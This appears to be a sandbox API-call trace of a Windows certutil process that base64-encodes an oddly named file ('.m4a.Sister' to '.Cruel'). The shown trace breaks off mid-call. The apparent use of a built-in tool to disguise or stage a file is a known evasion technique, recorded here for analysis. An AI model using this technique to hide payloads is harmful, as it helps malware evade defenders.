[0234.516] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0234.516] __set_app_type (_Type=0x1) [0234.516] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0234.517] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0234.553] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0234.553] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0234.554] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0234.554] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0234.554] WerSetFlags () returned 0x0 [0234.554] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.554] __iob_func () returned 0x7ffcea2dea00 [0234.555] _fileno (_File=0x7ffcea2dea30) returned 1 [0234.555] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0234.555] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0234.556] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0234.556] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0234.556] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0234.556] GetConsoleOutputCP () returned 0x1b5 [0234.626] _vsnwprintf (in: _Buffer=0xeabec7faa0, _BufferCount=0xb, _Format=".%d", _ArgList=0xeabec7f9c8 | out: _Buffer=".437") returned 4 [0234.626] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0234.626] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0234.626] GetFileType (hFile=0x50) returned 0x2 [0234.626] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0234.626] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0234.626] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.749] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0234.749] GetCommandLineW () returned="certutil -encode \"KoSrfJhDHVv1O_ 2.m4a.Sister\" \"KoSrfJhDHVv1O_ 2.m4a.Cruel\"" [0234.749] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2d9d6d5bb50 [0234.749] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2d9d6d4cf70 [0234.749] LocalFree (hMem=0x2d9d6d5bb50) returned 0x0 [0234.749] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2d9d6d522f0 [0234.749] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2d9d6d52230 [0234.749] LocalFree (hMem=0x2d9d6d522f0) returned 0x0 [0234.749] LocalFree (hMem=0x2d9d6d4cf70) returned 0x0 [0234.749] LocalFree (hMem=0x0) returned 0x0 [0234.750] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0234.750] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0234.750] GetCommandLineW () returned="certutil -encode \"KoSrfJhDHVv1O_ 2.m4a.Sister\" \"KoSrfJhDHVv1O_ 2.m4a.Cruel\"" [0234.751] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2d9d6d5bb50 [0234.751] GetSystemTime (in: lpSystemTime=0xeabec7f790 | out: lpSystemTime=0xeabec7f790*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x9, wMilliseconds=0x123)) [0234.751] SystemTimeToFileTime (in: lpSystemTime=0xeabec7f790, lpFileTime=0xeabec7f788 | out: lpFileTime=0xeabec7f788) returned 1 [0234.751] FileTimeToLocalFileTime (in: lpFileTime=0xeabec7f788, lpLocalFileTime=0xeabec7f750 | out: lpLocalFileTime=0xeabec7f750) returned 1 [0234.751] FileTimeToSystemTime (in: lpFileTime=0xeabec7f750, lpSystemTime=0xeabec7f4c0 | out: lpSystemTime=0xeabec7f4c0) returned 1 [0234.751] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xeabec7f4c0, lpFormat=0x0, lpDateStr=0xeabec7f5d0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0234.751] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xeabec7f4c0, lpFormat=0x0, lpTimeStr=0xeabec7f4d0, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0234.751] _vsnwprintf (in: _Buffer=0xeabec7f4de, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xeabec7f4a8 | out: _Buffer=" 09.291s") returned 8 [0234.751] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2d9d6d5e3d0 [0234.751] SetLastError (dwErrCode=0x80070716) [0234.751] _vsnwprintf (in: _Buffer=0xeabec7f558, _BufferCount=0xb, _Format="%d", _ArgList=0xeabec7f548 | out: _Buffer="948") returned 3 [0234.751] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xeabec7f310, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0234.752] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2d9d6d5b530 [0234.752] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2d9d6d4b730 [0234.752] LocalFree (hMem=0x2d9d6d5e3d0) returned 0x0 [0234.752] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xeabec7f800 | out: lpSystemTimeAsFileTime=0xeabec7f800*(dwLowDateTime=0xb6882244, dwHighDateTime=0x1d6141f)) [0234.752] GetLocalTime (in: lpSystemTime=0xeabec7f838 | out: lpSystemTime=0xeabec7f838*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x9, wMilliseconds=0x124)) [0234.752] SystemTimeToFileTime (in: lpSystemTime=0xeabec7f838, lpFileTime=0xeabec7f810 | out: lpFileTime=0xeabec7f810) returned 1 [0234.752] CompareFileTime (lpFileTime1=0xeabec7f810, lpFileTime2=0xeabec7f800) returned 1 [0234.752] _vsnwprintf (in: _Buffer=0xeabec7f848, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xeabec7f7d8 | out: _Buffer="GMT + 2.00") returned 10 [0234.752] LocalFree (hMem=0x2d9d6d5bb50) returned 0x0 [0234.753] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0234.753] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0234.753] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0234.753] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0234.753] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0234.753] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xeabec7f878 | out: _Buffer="10.0.15063.447") returned 14 [0234.753] GetACP () returned 0x4e4 [0234.753] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0234.753] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2d9d6d5b7d0 [0234.753] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2d9d6d5b7d0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0234.753] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2d9d6d5e2d0 [0234.753] _vsnwprintf (in: _Buffer=0x2d9d6d5e2d0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xeabec7f8c8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0234.753] LocalFree (hMem=0x2d9d6d5b7d0) returned 0x0 [0234.753] LocalFree (hMem=0x0) returned 0x0 [0234.754] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0234.754] GetACP () returned 0x4e4 [0234.754] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0234.754] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2d9d6d5b810 [0234.754] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2d9d6d5b810, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0234.754] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2d9d6d5e390 [0234.754] _vsnwprintf (in: _Buffer=0x2d9d6d5e390, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xeabec7f8c8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0234.754] LocalFree (hMem=0x2d9d6d5b810) returned 0x0 [0234.754] LocalFree (hMem=0x0) returned 0x0 [0234.754] GetACP () returned 0x4e4 [0234.754] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0234.754] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2d9d6d5b4f0 [0234.754] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2d9d6d5b4f0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0234.754] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2d9d6d5e450 [0234.754] _vsnwprintf (in: _Buffer=0x2d9d6d5e450, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xeabec7f8f8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0234.754] LocalFree (hMem=0x2d9d6d5b4f0) returned 0x0 [0234.754] LocalFree (hMem=0x2d9d6d5e2d0) returned 0x0 [0234.754] LocalFree (hMem=0x2d9d6d5e390) returned 0x0 [0234.754] LocalFree (hMem=0x2d9d6d5e450) returned 0x0 [0234.755] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0234.755] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0234.755] GetStockObject (i=0) returned 0x900010 [0234.755] RegisterClassW (lpWndClass=0xeabec7fa20) returned 0xc1a2 [0234.755] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1e02be [0234.821] NtdllDefWindowProc_W () returned 0x0 [0234.821] NtdllDefWindowProc_W () returned 0x1 [0234.828] NtdllDefWindowProc_W () returned 0x0 [0234.852] UpdateWindow (hWnd=0x1e02be) returned 1 [0234.852] PostMessageW (hWnd=0x1e02be, Msg=0x400, wParam=0x0, lParam=0x2d9d6d4217e) returned 1 [0234.852] GetMessageW (in: lpMsg=0xeabec7fa70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xeabec7fa70) returned 1 [0234.852] TranslateMessage (lpMsg=0xeabec7fa70) returned 0 [0234.852] DispatchMessageW (lpMsg=0xeabec7fa70) returned 0x0 [0234.852] NtdllDefWindowProc_W () returned 0x0 [0234.852] GetMessageW (in: lpMsg=0xeabec7fa70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xeabec7fa70) returned 1 [0234.853] TranslateMessage (lpMsg=0xeabec7fa70) returned 0 [0234.853] DispatchMessageW (lpMsg=0xeabec7fa70) returned 0x0 [0234.853] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x2d9d6d50ab0 [0234.853] LocalAlloc (uFlags=0x0, uBytes=0x9a) returned 0x2d9d6d44430 [0234.853] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0234.853] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0234.853] SetLastError (dwErrCode=0x80070716) [0234.853] _vsnwprintf (in: _Buffer=0xeabec7f478, _BufferCount=0xb, _Format="%d", _ArgList=0xeabec7f468 | out: _Buffer="465") returned 3 [0234.853] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xeabec7f230, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0234.853] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2d9d6d520e0 [0234.854] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0234.854] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0234.854] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xeabec7f210, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0234.854] GetLastError () returned 0xcb [0234.854] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0234.854] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0234.854] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0234.854] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0234.854] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0234.854] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0234.854] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0234.854] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0234.854] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0234.854] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0234.855] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0234.855] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0234.855] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0234.855] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0234.855] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0234.855] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0234.855] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0234.855] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0234.855] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0234.855] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0234.855] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0234.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xeabec7eed8 | out: phkResult=0xeabec7eed8*=0x23c) returned 0x0 [0234.855] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2d9d6d49180 [0234.855] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xeabec7f448, lpData=0xeabec7f478, lpcbData=0xeabec7f440*=0x4 | out: lpType=0xeabec7f448*=0x0, lpData=0xeabec7f478*=0x0, lpcbData=0xeabec7f440*=0x4) returned 0x2 [0234.855] LocalFree (hMem=0x2d9d6d49180) returned 0x0 [0234.855] RegCloseKey (hKey=0x23c) returned 0x0 [0234.855] LocalFree (hMem=0x0) returned 0x0 [0234.856] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2d9d6d6c680 [0234.910] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0234.910] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0234.910] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0234.911] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0234.911] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0234.911] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2d9d6d71570 [0234.911] GetComputerNameW (in: lpBuffer=0x2d9d6d71570, nSize=0xeabec7f440 | out: lpBuffer="NQDPDE", nSize=0xeabec7f440) returned 1 [0234.912] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xeabec7f410 | out: lpBuffer=0x0, nSize=0xeabec7f410) returned 0 [0234.912] GetLastError () returned 0xea [0234.912] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2d9d6d5b710 [0234.912] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2d9d6d5b710, nSize=0xeabec7f410 | out: lpBuffer="NQdPdE", nSize=0xeabec7f410) returned 1 [0234.912] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0234.915] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2d9d6d717c0, cbCertEncoded=0x63c2) returned 0x0 [0234.918] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2d9d6d717c0, cbCrlEncoded=0x63c2) returned 0x0 [0234.919] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2d9d6d717c0, cbEncoded=0x63c2, dwFlags=0x8000, pDecodePara=0xeabec7f2f0, pvStructInfo=0xeabec7f380, pcbStructInfo=0xeabec7f374 | out: pvStructInfo=0xeabec7f380, pcbStructInfo=0xeabec7f374) returned 0 [0234.919] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2d9d6d717c0, cbEncoded=0x63c2, dwFlags=0x8000, pDecodePara=0xeabec7f2f0, pvStructInfo=0xeabec7f380, pcbStructInfo=0xeabec7f374 | out: pvStructInfo=0xeabec7f380, pcbStructInfo=0xeabec7f374) returned 0 [0234.919] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2d9d6d717c0, cbEncoded=0x63c2, dwFlags=0x8000, pDecodePara=0xeabec7f2f0, pvStructInfo=0xeabec7f380, pcbStructInfo=0xeabec7f374 | out: pvStructInfo=0xeabec7f380, pcbStructInfo=0xeabec7f374) returned 0 [0234.919] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2d9d6d6a0f0 [0234.929] CryptMsgUpdate (hCryptMsg=0x2d9d6d6a0f0, pbData=0x2d9d6d717c0, cbData=0x63c2, fFinal=1) returned 0 [0234.929] GetLastError () returned 0x8009310b [0234.929] CryptMsgClose (hCryptMsg=0x2d9d6d6a0f0) returned 1 [0234.930] GetFileAttributesExW (in: lpFileName="KoSrfJhDHVv1O_ 2.m4a.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\kosrfjhdhvv1o_ 2.m4a.sister"), fInfoLevelId=0x0, lpFileInformation=0xeabec7f3a0 | out: lpFileInformation=0xeabec7f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a81feb0, ftCreationTime.dwHighDateTime=0x1d5e999, ftLastAccessTime.dwLowDateTime=0x3ad49150, ftLastAccessTime.dwHighDateTime=0x1d5e64c, ftLastWriteTime.dwLowDateTime=0x3ad49150, ftLastWriteTime.dwHighDateTime=0x1d5e64c, nFileSizeHigh=0x0, nFileSizeLow=0x63c2)) returned 1 [0234.930] _vsnwprintf (in: _Buffer=0xeabec7f3a8, _BufferCount=0xb, _Format="%d", _ArgList=0xeabec7f398 | out: _Buffer="359") returned 3 [0234.930] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xeabec7f160, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0234.930] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2d9d6d71180 [0234.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0234.930] _vsnwprintf (in: _Buffer=0xeabec7e390, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xeabec7f3e8 | out: _Buffer="Input Length = 25538") returned 20 [0234.930] GetFileType (hFile=0x50) returned 0x2 [0234.930] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xeabec7e390*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xeabec7e344, lpReserved=0x0 | out: lpBuffer=0xeabec7e390*, lpNumberOfCharsWritten=0xeabec7e344*=0x14) returned 1 [0235.054] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0235.055] _vsnwprintf (in: _Buffer=0xeabec7e390, _BufferCount=0x1ff, _Format="\n", _ArgList=0xeabec7f3e8 | out: _Buffer="\n") returned 1 [0235.055] GetFileType (hFile=0x50) returned 0x2 [0235.055] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xeabec7e390*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xeabec7e344, lpReserved=0x0 | out: lpBuffer=0xeabec7e390*, lpNumberOfCharsWritten=0xeabec7e344*=0x1) returned 1 [0235.204] GetFileAttributesExW (in: lpFileName="KoSrfJhDHVv1O_ 2.m4a.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\kosrfjhdhvv1o_ 2.m4a.cruel"), fInfoLevelId=0x0, lpFileInformation=0xeabec7f3a0 | out: lpFileInformation=0xeabec7f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6c226a1, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xb6c226a1, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb6c7f692, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x8966)) returned 1 [0235.204] _vsnwprintf (in: _Buffer=0xeabec7f3a8, _BufferCount=0xb, _Format="%d", _ArgList=0xeabec7f398 | out: _Buffer="361") returned 3 [0235.204] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xeabec7f160, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0235.204] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2d9d6d71660 [0235.204] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0235.204] _vsnwprintf (in: _Buffer=0xeabec7e390, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xeabec7f3e8 | out: _Buffer="Output Length = 35174") returned 21 [0235.204] GetFileType (hFile=0x50) returned 0x2 [0235.204] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xeabec7e390*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xeabec7e344, lpReserved=0x0 | out: lpBuffer=0xeabec7e390*, lpNumberOfCharsWritten=0xeabec7e344*=0x15) returned 1 [0235.353] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0235.353] _vsnwprintf (in: _Buffer=0xeabec7e390, _BufferCount=0x1ff, _Format="\n", _ArgList=0xeabec7f3e8 | out: _Buffer="\n") returned 1 [0235.353] GetFileType (hFile=0x50) returned 0x2 [0235.353] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xeabec7e390*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xeabec7e344, lpReserved=0x0 | out: lpBuffer=0xeabec7e390*, lpNumberOfCharsWritten=0xeabec7e344*=0x1) returned 1 [0235.429] LocalFree (hMem=0x2d9d6d717c0) returned 0x0 [0235.430] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0235.430] _vsnwprintf (in: _Buffer=0xeabec7f408, _BufferCount=0xb, _Format="%d", _ArgList=0xeabec7f3f8 | out: _Buffer="2022") returned 4 [0235.430] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xeabec7f1c0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0235.430] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2d9d6d48b60 [0235.430] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0235.430] _vsnwprintf (in: _Buffer=0xeabec7e3f0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xeabec7f448 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0235.430] GetFileType (hFile=0x50) returned 0x2 [0235.430] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xeabec7e3f0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xeabec7e3a4, lpReserved=0x0 | out: lpBuffer=0xeabec7e3f0*, lpNumberOfCharsWritten=0xeabec7e3a4*=0x31) returned 1 [0235.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0235.505] _vsnwprintf (in: _Buffer=0xeabec7e3f0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xeabec7f448 | out: _Buffer="\n") returned 1 [0235.505] GetFileType (hFile=0x50) returned 0x2 [0235.505] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xeabec7e3f0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xeabec7e3a4, lpReserved=0x0 | out: lpBuffer=0xeabec7e3f0*, lpNumberOfCharsWritten=0xeabec7e3a4*=0x1) returned 1 [0235.605] LocalFree (hMem=0x0) returned 0x0 [0235.605] LocalFree (hMem=0x2d9d6d44430) returned 0x0 [0235.605] LocalFree (hMem=0x2d9d6d50ab0) returned 0x0 [0235.605] SetLastError (dwErrCode=0x80070716) [0235.605] _vsnwprintf (in: _Buffer=0xeabec7f478, _BufferCount=0xb, _Format="%d", _ArgList=0xeabec7f468 | out: _Buffer="511") returned 3 [0235.605] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xeabec7f230, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0235.605] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2d9d6d71330 [0235.605] PostQuitMessage (nExitCode=0) [0235.606] GetMessageW (in: lpMsg=0xeabec7fa70, hWnd=0x0, wMsgFilterMin=0x0, 